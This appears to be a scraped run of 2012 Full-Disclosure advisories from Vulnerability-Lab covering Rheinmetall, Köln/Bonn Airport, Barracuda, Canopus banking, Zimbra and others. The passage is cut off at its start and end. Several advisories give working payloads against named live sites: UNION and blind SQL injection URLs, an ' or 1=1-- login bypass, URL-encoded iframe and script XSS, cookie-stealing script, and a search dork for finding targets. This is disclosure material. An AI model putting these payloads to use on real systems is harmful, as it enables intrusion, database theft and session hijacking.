external redirects, persistent context manipulation on requests persistent phishing. Vulnerable Module(s): [+] Reports = Executive Summery = Name Input Fields Output Listing Category [+] EMail = Filter Add or Configure Edit [+] EMail = Add Blacklist Rule Add Whitelist Rule [+] EMail Settings - New Domain Picture(s): ../1.png ../2.png 1.2 Multiple non-persistent cross site scripting vulnerabilities are detected on the Syneto Unified Threat Management Security Appliance Application. The vulnerability allows remote attacker to hijack customer/admin sessions via client side cross site scripting requests. Successful exploitation requires user inter action results in account steal via session hijacking. Vulnerable Module(s): [+] Index - Exception Handling via Errors [+] Index - Info Requests Affected Version(s): [+] Synetos Security UTM Application v1.4.x v1.3.3 Community Edition Proof of Concept: = The vulnerabilities can be exploited by privileged user accounts, lowviewers or remote attackers with required user inter action. For demonstration or reproduce ... 1.1.1 [+] Reports - Executive Summery - Output Listing Category tr id=list_1 class=tableRowEven td class=status valign=top align=center a href=# title=Disable the reporting list class=disableListimg src=img/enabled.gif title=disable alt=disable class=disable/a a style=display: none; href=# title=Enable the reporting list class=enableList img src=img/disabled.gif title=enable alt=enable class=enable/a /td td valign=top EXECUTION OF PERSISTENT SCRIPT CODE!' = td= td valign=top nowrap=nowrap a href=# id=list_1 class=editListimg src=img/edit.gif title=Edit alt=Edit //a a href=syneto.php?menuid=307action=deleteid=1 class=deleteList ;img src=img/delete.gif title=Delete alt=Delete //a /td /tr /tbody /table /div Reference(s): https://[SYNETO UTM SERVER].com/syneto.php?menuid=307 1.1.2 [+] EMail - Filter Add Configure divSender = EXECUTION OF PERSISTENT SCRIPT CODE!.*/div divReceiver = .*/div divSubject = .*(SPAM|VIAGRA).*/div Reference(s): https://[SYNETO UTM SERVER].com/syneto.php?menuid=63 1.1.3 [+] EMail Settings - New Domain table class=data id=smtpDomainsList thead tr th class=statusStatus/th th class=domainDomain/th th class=routingRouting/th th class=verify_senderVerify sender/th th class=qdmSend digest/th th class=actionsActions/th /tr /thead tbody tr id=domain_3 class=tableRowEven editableDomain EXECUTION OF PERSISTENT SCRIPt CODE!td class=status input name=active value=1 type=hidden input name=qdm_enabled value= type=hidden input name=qdm_hours value=23 type=hidden input name=admin_email value=scriptEXECUTION
[Full-disclosure] RheinMetall AG - Multiple SQL Injection Vulnerabilities
Title: == RheinMetall AG - Multiple SQL Injection Vulnerabilities Date: = 2012-01-17 References: === http://www.vulnerability-lab.com/get_content.php?id=170 VL-ID: = 170 Introduction: = - UK Rheinmetall AG is a German automotive and defence company with factories in Düsseldorf, Kassel and Unterlüß. The company has a long tradition of making guns and artillery pieces. The company is also involved in a variety of advanced metal-working and milling technologies, allowing it to provide special high-quality components for small arms in addition to heavy weapon production. * A traditional company with 20,000 employees worldwide * Market leader in its core competencies * EUR 3.4 billion annual sales (2009) (Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/Rheinmetall) - DE Rheinmetall ist im Jahr 1889 als Rheinische Metallwaaren- und Maschinenfabrik Actiengesellschaft gegründet worden. Heute steht die Rheinmetall AG für ein substanzstarkes, international erfolgreiches Unternehmen in den Märkten für Automobilzulieferung und Wehrtechnik.Im Bereich Automotive hat sich die Führungsgesellschaft Kolbenschmidt Pierburg AG mit ihren Geschäftsbereichen KS Kolbenschmidt, Pierburg, KS Aluminium-Technologie, Pierburg Pump Technology, KS Gleitlager und Motor Service auf Module und Systeme rund um den Motor spezialisiert. Für die aktuellen und künftigen Anforderungen der Hersteller werden innovative Lösungen in den Bereichen Schadstoffreduzierung, Verbrauchsminderung, Leichtbau und Leistungs-optimierung entwickelt und vertrieben. Die Defence Sparte des Rheinmetall Konzerns zählt mit ihren Geschäftsbereichen Fahrzeug-systeme, Waffe und Munition, Antriebe, Flugabwehr, Verteidigungselektronik sowie Simulation und Ausbildung zu den namhaften und großen Adressen der internationalen Verteidigungs- und Sicherheitsindustrie. * Traditionsunternehmen mit 20.000 Mitarbeitern weltweit * Marktführer in seinen Kernkompetenzen * 3,4 Mrd EUR Jahresumsatz (2009) (Copy of the Vendor Homepage: http://www.rheinmetall.de/) Abstract: = An anonymous researcher of the Vulnerability-Lab Team discovered multiple critical SQL Injection Vulnerabilities on the famous RheinMetalll AG Vendor, KSPG Defense Website. Report-Timeline: 2011-01-09: Vendor Notification 2011-02-25: Vendor Notification 2 2011-03-16: Vendor Notification 3 2011-**-**: Vendor Response/Feedback 2011-01-06: Vendor Fix/Patch by VLAB Check 2012-01-17: Public or Non-Public Disclosure Status: Published Affected Products: == Exploitation-Technique: === Remote Severity: = Critical Details: Multiple SQl injection vulnerabilities are detected on the official website of Rheinmetall RDefense. Remote attackers can execute own sql commands via injection to compromise the web server or the affected dbms. Successful exploitation can result in sensitive information steal by dumping all application web databases of the main , kspg defense website. Vulnerable Module(s): [+] contact.php [+] index.php [+] jobinfo.php [+] index.php [+] print.php Vulnerable: [+] ?lang= [+] ?id= [+] ?gid= [+] ?jid= [+] ?fid= Affected Domains: [+] rheinmetall.com [+] hrp.rheinmetall.com [+] rheinmetall-defence.com [+] KSPG AG all Offices Websites (http://www.kspg-ag.de/index.php?fid=119lang=de) --- Exception Logs --- You have an error in your SQL syntax near -* at line 1 You have an error in your SQL syntax near -*-at line 1 -- You have an error in your SQL syntax nearand cms_release=1 and cms_trash=0 and cms_syscat=0 order by cms_order -*at line 1 -- You have an error in your SQL syntax near -* and cms_release = 1 and cms_trash = 0 and cms_syscat = 0-*at line 1You have an error in your SQL syntax near -* and cms_release = 1 and cms_trash = 0 and cms_syscat = 0 -* at line 1You have an error in your SQL syntax near -* and cms_release = 1 and cms_trash = 0 and cms_syscat = 0 -* at line 1You have an error in your SQL syntax near -* and cms_release = 1 and cms_trash = 0 and cms_syscat = 0 -* at line 1You have an error in your SQL syntax near -* and cms_release = 1 and cms_trash = 0 and cms_syscat = 0-* at line 1You have an error in your SQL syntax near -* and cms_release = 1 and cms_trash = 0 and cms_syscat = 0-* at line 1You have an error in your SQL syntax near -* and cms_release = 1 and cms_trash = 0 and cms_syscat = 0-* at line 1You have an
[Full-disclosure] Airport Koeln/Bonn - Blind SQL Injection Vulnerabilities
Title: == Airport Koeln/Bonn - Blind SQL Injection Vulnerabilities Date: = 2012-01-20 References: === http://www.vulnerability-lab.com/get_content.php?id=174 VL-ID: = 174 Introduction: = Der Köln Bonn Airport ist einer der größten Verkehrsflughäfen Deutschlands. Jährlich entscheiden sich mehr als 10 Millionen Passagiere für den „Flughafen der kurzen Wege“ – damit liegt er bundesweit auf Platz sechs. Mit etwa 590 000 Tonnen umgeschlagener Luftfracht pro Jahr hält Köln/Bonn hinter Frankfurt Platz zwei. Passagieraufkommen und Frachtumschlag zusammengenommen landet der Airport auf Rang viermehr Als die Low-Cost-Carrier Germanwings und TUIfly den einstigen Regierungsflughafen „Konrad Adenauer“ im Jahr 2002 zu ihrer Heimatbasis erklärten, entwickelte sich Köln/Bonn rasant. Das Passagieraufkommen hat sich binnen fünf Jahren verdoppelt, die Zahl der Reiseziele überschritt die Marke 130. Geographisch liegt der Airport in einer der am dichtesten besiedelten Regionen Europas; etwa 15,5 Millionen Menschen leben im Umkreis von 100 Kilometern. Die hervorragende Verkehrsinfrastruktur sowie die 24-Stunden-Betriebserlaubnis begründen das Wachstumspotenzial, dass der Airport mit seinen drei Start- und Landebahnen hat. In den beiden Terminals gibt es 86 Check-In-Schalter. Über 55 Gates und 19 Fluggastbrücken erreichen Passagiere die Flugzeuge. Die neue Passagierkontrollstelle im Terminal 1 wurde Ende vergangenen Jahres von 10 auf 18 Kontrollspuren erweitert. Köln/Bonn ist ideal über Autobahnen und Schnellstraßen zu erreichen. Seit 2004 verbindet der unterirdische Flughafen-Bahnhof die Terminals 1 und 2 miteinander. Täglich halten dort 170 Züge, unter anderem Intercity, Regional- und S-Bahnen. In drei Parkhäusern stehen zusammen 11 200 Stellplätze zur Verfügung. (Copy of the Vendor Homepage: http://www.airport-cgn.de/main.php?id=49lang=1) Abstract: = An anonymous Vulnerability Laboratory Researcher discovered multiple critical SQL Injection Vulnerabilities on the official Bonn and Koeln Airport Vendor Website. Report-Timeline: 2011-03-02: Vendor Notification 2011-**-**: Vendor Response/Feedback 2012-01-03: Vendor Fix/Patch 2012-01-20: Public or Non-Public Disclosure Status: Published Affected Products: == Exploitation-Technique: === Remote Severity: = Critical Details: Multiple Blind SQl Injection vulnerabilities are detected on the Köln/Bonn Airport Website. The vulnerability allows remote attackers to inject own sql commands on the affected application dbms. Successful exploitation can result in dbms, website application compromise. Vulnerable Module(s): [+] Index Main Picture(s): ../sql1.png Proof of Concept: = The vulnerabilities can be exploited by remote attackers without user inter action. For demonstration or reproduce ... Vulnerable Files: index.php ; main.php Vulnerable Value: ?langID= ; id=4sm= ; ?id=174kat= Blind SQL Injection - Reference(s): http://www.airport-cgn.de/barrierefrei/index.php?langID=1+AND+IF%28SUBSTRING%28VERSION%28%29,1,1%29=5,1,2%29=1id=5sm=-1%27 http://www.airport-cgn.de/barrierefrei/index.php?langID=1id=4sm=11%20order%20by%201-- http://www.koeln-bonn-airport.de/main.php?id=174kat=1 and 1=2-- SQL Injection - Reference(s): http://www.airport-cgn.de/barrierefrei/index.php?langID=1id=-1%20union%20all%20select%201,CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28%29,version%28%29%29-- http://www.koeln-bonn-airport.de/main.php?id=174kat=-1%20union%20all%20select%201,2,CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28%29,version%28%29%29,4,5,CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28%29,version%28%29%29,7-- Blind SQL Injection - Reference(s): http://www.airport-cgn.de/barrierefrei/index.php?langID=1+AND+IF%28SUBSTRING%28VERSION%28%29,1,1%29=5,1,2%29=1id=5sm=-1%27 http://www.airport-cgn.de/barrierefrei/index.php?langID=1id=4sm=11%20order%20by%201-- http://www.koeln-bonn-airport.de/main.php?id=174kat=1 and 1=2-- Solution: = 2012-01-03: Vendor Fix/Patch Risk: = The security risk of the blind sql injection vulnerabilities are estimated as critical. Credits: Vulnerability Research Laboratory - N/A Anonymous Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have
[Full-disclosure] Barracuda Spam/Virus WAF 600 - Multiple Web Vulnerabilities
Title: == Barracuda Spam/Virus WAF 600 - Multiple Web Vulnerabilities Date: = 2012-01-19 References: === http://www.vulnerability-lab.com/get_content.php?id=28 VL-ID: = 28 Introduction: = Barracuda Networks - Worldwide leader in email and Web security. The Barracuda Spam Virus Firewall is an integrated hardware and software solution for complete protection of your email server. It provides a powerful, easy-to-use and affordable solution to eliminating spam and viruses from your organization by providing the following protection: Barracuda Spam Virus Firewall * Anti-spam * Anti-virus * Anti-spoofing * Anti-phishing * Anti-spyware (Attachments) * Denial of Service The Barracuda Spam Virus Firewall is compatible with all email servers and can fit into nearly any corporate or small business environment. It is used by small organizations with as few as 10 employees and large organizations with as many as 200,000 employees. A single Barracuda Spam Virus Firewall handles up to 100,000 active email users. Multiple units can be clustered together for even greater capacity and high availability. The Barracuda Spam Virus Firewall protects your email server with twelve defense layers: * Network Denial of Service Protection * Rate Control * IP Reputation Analysis * Sender Authentication * Recipient Verification * Virus Scanning ... (Copy of the Vendor Homepage: http://www.barracudanetworks.com/ns/products/spam_overview.php) Abstract: = Vulnerability Lab Team discovered multiple persistent Web Vulnerabilities on Barracudas Spam Virus Firewall 600 appliance application. Report-Timeline: 2011-04-01: Vendor Notification 2011-08-04: Vendor Response/Feedback 2011-12-22: Vendor Fix/Patch by Check 2012-01-19: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Medium Details: Multiple persistent Input Validation vulnerabilities are detected on Barracudas Spam Virus Web Firewall 600. Local low privileged user account can implement/inject malicious persistent script code. When exploited by an authenticated user, the identified vulnerabilities can lead to information disclosure, access to intranet available servers, manipulated persistent content. Vulnerable Module(s): [+] Trace route Device - Troubleshooting [+] LDAP Configuration - LDAP Username Affected Version(s): [+] Barracuda Spam Virus Firewall 600 Affected Firmware(s): [+] Firmware v4.0.1.009 older versions Picture(s): ../ldap.png Proof of Concept: = The persistent vulnerabilities can be exploited by local low privileged user accounts with low required user inter action or by remote attackers with high required user inter action. Manually Steps ... 1. Login to the Barracuda Application 2. Open the vulnerable area were the persistent vulnerability is located 3. Include/Insert your own script code or poc and save/execute the content to inject 4. View the injected results which were stored on application side. The code is getting executed in the output section PoC: %3E%3E%22%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%77%77%77%2 E%76%75%6C%6E%65%72%61%62%69%6C%69%74%79%2D%6C%61%62%2E%63%6F%6D%20%77%69%64% 74%68%3D%36%30%30%20%68%65%69%67%68%74%3D%36%30%30%3E Solution: = 2011-12-22: Vendor Fix/Patch Risk: = The security risk of the persistent vulnerabilities are estimated as medium(+). Credits: Vulnerability Research Laboratory - Benjamin Kunz Mejri (Rem0ve) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are
[Full-disclosure] Engine by Avatarus Simple CMS - SQL Injection Vulnerability
Title: == Engine by Avatarus Simple CMS - SQL Injection Vulnerability Date: = 2012-01-19 References: === http://www.vulnerability-lab.com/get_content.php?id=388 VL-ID: = 388 Introduction: = Engine by Avatarus Powered by Simple CMS is mainly used on the pages devoted to the game. (Copy of the Vendor Homepage: http://avatarus.biz) Abstract: = A Vulnerability Laboratory researcher discovered a critical (remote) SQL Injection Vulnerability on Engine by Avatarus powered by the Simple CMS. Report-Timeline: 2012-01-19: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = High Details: A remote SQL Injection Vulnerability has been discovered on the Engine by Avatarus Powered by Simple CMS application. The vulnerability allows an attacker to execute own sql commands via injection. The bug is located on the following files ... panel_admina.php, artykul.php, artykul.php. Successful exploitation can result in cms dbms comprimise via remote sql injection. Vulnerable Module(s): [+] panel_admina.php [+] artykul.php [+] raport.php Risk: = The security risk of the remote sql injection vulnerability is estimated as high(+). Credits: Vulnerability Laboratory Researcher - snup (snup@gmail.com) === = Gr33tz: = = agilob, cOnd, czoik, drummachina, gocys, prick = = im2ee, MadCow, n1k0n3r, R3w, rtgn, SiD, vizzdoom = = antonius, Rem0ve, irc.freenode.net #pakamera = Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Snitz Communications 2010/11 - SQL Injection Vulnerability
Title: == Snitz Communications 2010/11 - SQL Injection Vulnerability Date: = 2012-01-18 References: === http://www.vulnerability-lab.com/get_content.php?id=384 VL-ID: = 384 Introduction: = Snitz Forums 2000, one of the best ASP based bulletin board systems on the market. Getting better every day! A complete board system (forum) that allows the user access to a friendly and intuitive interface. (Copy of the Vendor Homepage: http://forum.snitz.com/specs.asp) Abstract: = A Vulnerability Laboratory researcher discovered a remote SQL Injection Vulnerability on Snitz Communications. Report-Timeline: 2011-11-02: Vendor Notification 2012-01-18: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = High Details: A remote SQL Injection Vulnerability has been discovered on the Snitz Communication forum application. The vulnerability allows an attacker to execute own sql commands via injection. The bug is located on the forum.asp file of the content management system. Successful exploitation can result in application dbms compromise. Vulnerable Module(s): [+] Forum.ASP Proof of Concept: = The vulnerability cna be exploited by remote attacker without user inter action. For demonstration or reproduce ... DORK: inurl:forum.asp?TOPIC_ID= intext:2000 - 2001 Snitz Communications PoC: http://127.0.0.1/forum.asp?TOPIC_ID=[SQL INJECTION] Risk: = The security risk of the remote sql injection vulnerability is estimated as high(+). Credits: Vulnerability Laboratory Researcher - Snup (snup@gmail.com) === = Gr33tz: = = agilob, cOnd, czoik, drummachina, gocys, prick = = im2ee, MadCow, n1k0n3r, R3w, rtgn, SiD, vizzdoom = = antonius, Rem0ve, irc.freenode.net #pakamera = Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Tine v2.0 Maischa - Cross Site Scripting Vulnerability
Title: == Tine v2.0 Maischa - Cross Site Scripting Vulnerability Date: = 2012-01-13 References: === http://www.vulnerability-lab.com/get_content.php?id=379 VL-ID: = 379 Introduction: = Tine 2.0 is an open source project which combines groupware and CRM in one consistent interface. Tine 2.0 is web-based and optimises collaboration and organisation of groups in a lasting manner. Tine 2.0 unites all the advantages of open source software with an extraordinarily high level of usability and an equally high standard of professional software development. This is what makes the difference between Tine 2.0 and many other existing groupware solutions. Tine 2.0 includes address book, calendar, email, tasks, time tracking and CRM. Intelligent functions and links make collaboration in Tine 2.0 a true pleasure and include: Synchronising mobile telephones, such as iPhone, Android, Nokia and Windows Mobile VoiP integration Flexible assigning of authorisation rights Dynamic lists Search functions History PDF export (Copy from the Vendor Homepage: http://www.tine20.org/) Abstract: = Vulnerability-Lab Team Researcher discovered multiple persistent Web Vulnerabilities on the Tine v2.0 Content Management System. Report-Timeline: 2011-12-01: Vendor Notification 2012-01-12: Public or Non-Public Disclosure Status: Published Affected Products: == MetaWays Product: Tine CMS v2.0 Exploitation-Technique: === Remote Severity: = Medium Details: Multiple input validation vulnerabilities(persistent) are detected on Tine v2.0 Content Management System. Local attackers can include (persistent) malicious script code to manipulate specific user/admin requests. The vulnerability allows an local privileged attacker to manipulate the appliance(application) via persistent script code inject. Successful exploitation can result in session hijacking or persistent context manipulation on requests. Vulnerable Module(s): [+] New Contacts - Input Output [+] Lead Name - Input Output Picture(s): ../1.png ../2.png ../3.png Proof of Concept: = The vulnerability can be exploited by local privileged user accounts or local attackers. For demonstration or reproduce ... PoC: scriptalert(document.cookie)/scriptdiv style=1 Risk: = The security risk of the persistent software vulnerability is estimated as medium(-). Credits: Vulnerability Research Laboratory - Ucha Gobejishvili (longrifle0x) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] MegaSWF - Persistant Cross Site Scripting Vulnerability
Title: == MegaSWF - Persistant Cross Site Scripting Vulnerability Date: = 2012-01-12 References: === http://www.vulnerability-lab.com/get_content.php?id=368 VL-ID: = 368 Introduction: = Do you create Flash games, Flash animations, or any other type of content saved in the .SWF extension? MegaSWF offers you a free, stable .SWF file repository on our high-speed servers. To take advantage of our service, simply click the Upload button. You can also create an account with MegaSWF for more capacity and more functionality. We are always adding new features based on the feedback we get from our users. (Copy of the Vendor Homepage: http://megaswf.com/about) Abstract: = A Vulnerability-Lab Reseacher discovered a persistent cross site scripting vulnerability on the MegaSWF website. Report-Timeline: 2011-12-03: Vendor Notification 2012-01-12: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Medium Details: A persistent cross site scripting vulnerability is detected on the MegaSwf website service. The vulnerability allows an remote attacker with required user inter action to hijack customer sessions via persistent cross site scripting. Successful exploitation can result in account steal, client side exploitation or phishing session hijacking. The bug is located on the serve module in-/output of the megaswf service web application. Vulnerbale Module(s): [+] serve Picture(s): ../1.png Proof of Concept: = The vulnerability can be exploited by remote attacker with required user inter action. For demonstration or reproduce ... PoC: [1] Create an URLRequest-Object with a JS-Code like : var alert:URLRequest = new URLRequest(javascript:alert('xss')); [2] Publishing the swf in megaswf.com will exploit a persistent xss-vulnerability and run your JS code. Full code-example that can be used on a frame as actionscript : import flash.net.URLRequest; var alert:URLRequest = new URLRequest(javascript:alert('xss')); navigateToURL(alert, _self); Reference(s) : http://megaswf.com/serve/1471214 Risk: = The security risk of the persistant cross site scripting vulnerability is estimated as medium(+). Credits: Vulnerability Research Laboratory - Sebastian Lüdtke (yak0n) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2011|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Canopus Internet Banking FIVE - Auth Bypass Vulnerability
Title: == Canopus Internet Banking FIVE - Auth Bypass Vulnerability Date: = 2012-01-12 References: === http://www.vulnerability-lab.com/get_content.php?id=305 VL-ID: = 305 Introduction: = Automation of banks, small and medium sized, money transfer systems, corporate treasuries, e-payment systems, e-currency bureaux de change,automation of payment institution, - is the key activity areas are of CANOPUS Software Ltd. (established in 1992) Today, our clients are dozens of banks and financial companies, payment institutions, registered in various jurisdictions. (Copy of the Vendor Homepage: http://www.canopuslab.com/ ) Abstract: = Vulnerability-Lab Team (Chokri B.A.) discovered an Auth Bypass vulnerability on the famous russian Canopus Banking Systems Application. Report-Timeline: 2011-31-10: Vendor Notification 2011-**-** Vendor Response/Feedback 2011-**-**: Vendor Fix/Patch 2012-01-12: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Critical Details: An Auth Bypass vulnerability is detected on the online banking content management system of the Canopus Software. The bypass vulnerability is located on the unparsed login form of the web-application banking system. Successful exploitation allows an attacker to bypass the login restriction of the banking system with ID 1 (Admin). Vulnerable Module(s): [+] Login Picture(s): ../1.png Proof of Concept: = The vulnerability can be exploited by a remote attackers without user inter action. For demonstration or reproduce ... Auth Bypass - PoC: user : ' or 1=1-- pass : ' or 1=1-- Reference(s): http://tmab.canopus.ru/IBdemo/ Risk: = The security risk of the Auth Bypass Vulnerability is estimated as critical. Credits: Vulnerability Research Laboratory - Chokri B.A. (Me!ster) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Zimbra Desktop v7.1.2 - Persistent Software Vulnerability
Title: == Zimbra Desktop v7.1.2 - Persistent Software Vulnerability Date: = 2012-01-12 References: === http://www.vulnerability-lab.com/get_content.php?id=378 VL-ID: = 378 Introduction: = The Zimbra offline client (also Zimbra Desktop) for Microsoft Windows, Apple Mac OS and Linux is currently available in version 7.1.2. He is with the web interface in appearance and operation almost completely identical. The offline client is a Mozilla Prism application. (Copy from the Vendor Homepage: http://de.wikipedia.org/wiki/Zimbra#Zimbra_Desktop) Abstract: = Vulnerability-Lab Team discovered multiple persistent Web Vulnerabilities on Zimbras Prism Desktop Application. Report-Timeline: 2011-11-01: Vendor Notification 2012-01-12: Public or Non-Public Disclosure Status: Published Affected Products: == Zimbra Inc. Product: Zimbra Desktop v7.1.2 b10978 Exploitation-Technique: === Remote Severity: = Medium Details: Multiple input validation vulnerabilities(persistent) are detected on Zimbra Desktop v7.1.2. Local attackers can include (persistent) malicious script code to manipulate specific customer/admin requests. The vulnerability allows an local privileged attacker to manipulate the appliance(application) via persistent script code inject. It is also possible to hijack customer sessions via persistent script code execution on application side. Successful exploitation can also result in context/module request manipulation, execution of persistent malicious script code, session hijacking(account steal) application side mailbox phishing attacks. Vulnerable Module(s): [+] Label Name - Username MailBox Name Picture(s): ../1.png ../2.png ../3.png Proof of Concept: = The vulnerability can be exploited by local low privileged user accounts or local attackers. For demonstration or reproduce ... PoC: %3E%22%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%76%75%6C%6E%65%72%61%62 %69%6C%69%74%79%2D%6C%61%62%2E%63%6F%6D%20%77%69%64%74%68%3D%36%30%30%20%68%65%69%67%68 %74%3D%36%30%30%3E%3E%3C%22%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65 %6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%64%69%76%20%73%74%79%6C%65 %3D%22%31 Solution: = The vulnerability can be patched/fixed via restrict on the input fields and parse on the input/output section or listings. Risk: = The security risk of the persistent software vulnerability is estimated as medium(-). Credits: Vulnerability Research Laboratory - N/A Anonymous Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] DUS INT Airport - Multiple SQL Injection Vulnerabilities
